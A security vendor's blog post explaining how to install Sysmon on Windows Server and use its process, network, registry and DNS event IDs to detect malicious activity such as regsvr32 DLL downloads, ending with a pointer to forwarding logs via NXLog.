In addition to the default built-in logging that Windows Server offers, there are also additional configuration options and software that can be added to increase the visibility of your environment. In addition to enabling Windows Advanced Auditing, System Monitor (Sysmon) is one of the most commonly used add-ons for Windows logging. With Sysmon, you can detect malicious activity by tracking code behavior and network traffic, as well as create detections based on the malicious activity.
Sysmon is part of the Sysinternals software package, now owned by Microsoft and enriches the standard Windows logs by producing some higher level monitoring of events such as process creations, network connections and changes to the file system. It is extremely easy to install and deploy. Following these steps will turn on an incredible amount of logging.
Learn more about the benefits of Sysmon>
You can run a Poshim script to automatically install Sysmon, or you can install it manually:
Invoke-WebRequest -Uri https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml -OutFile C:\Windows\config.xmlsysmon64.exe –accepteula –i c:\windows\config.xml
There are several extremely helpful Windows Event IDs that Sysmon generates to help detect common threats in many different enterprises. A few examples of the more useful generated events for security purposes are listed below. A full list of Event IDs that Sysmon can generate are located on their download page.
If you need to access the Sysmon events locally as opposed to viewing them in a SIEM, you will find them in the event viewer under Applications and Services Logs > Microsoft > Windows > Sysmon.
Sysmon will not only show what processes are being run, it will also show when they are ended, as well as a lot of information about the executable or binary itself. It also provides hashes for all of the binaries that are run on the system and lists if they are signed or not, making it easy to see if malicious code is attempting to mimic legitimate programs such as PowerShell or other built-in Microsoft tools.
Above, you can see the Registry Editor program being run. In certain cases when you are unable to have an allowlist-only environment, you can use events such as these to alert when processes are running, if they are signed by the appropriate vendor, or spawning processes that they shouldn’t be (such as MS Word spawning PowerShell).
In this example, we can see where the Setup.exe has been run, by whom, as well as that it is reaching out to download additional content from a cloud provider. These events can be useful in detecting command and control traffic (which may indicate that attackers are sending commands that steal data, spread malware, etc.), as well as giving visibility into what applications are accessing certain internet resources.
One potential action an attacker or malicious user could take is to disable the Sysmon service if they have the privileges to do so.
Alerts on additions and modifications of certain registry locations can be beneficial for detecting malicious persistence on an endpoint. Many times entries are added to “Run” and “Run Once” on Windows so malware can resume its activities after a host is rebooted.
There are several benefits to logging DNS traffic, such as finding malicious remote access tools, security misconfigurations and command and control traffic.
Here we can see the popular Red Canary Atomic Red Team test for MITRE ATT&CK T1117 “Regsvr32” across several of the listed event IDs. Basically, regsvr32 can download and register DLLs (dynamic-link libraries) from URLs via the command line, something that is relatively easy to detect with Sysmon installed.
Event ID 1 shows:
Event ID 3 Shows:
Event ID 22 Shows:
And when you tie them all together, you can create detections based on the malicious activity.
Learn more about getting the most out of your Windows logging tools in “How to Optimize Windows Logging for Security,” and see how Blumira’s platform automatically detects and remediates security findings.
Once Sysmon is configured, you will need to add the Sysmon event channel to your NXLog configuration in order to start sending logs to Blumira’s platform for detection and response. You can use our latest version of Flowmira, or add the Sysmon route to your existing config. The latest version of Flowmira can be found here: https://github.com/Blumira/Flowmira/blob/master/nxlog.conf
To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity.
In this guide, you’ll learn:
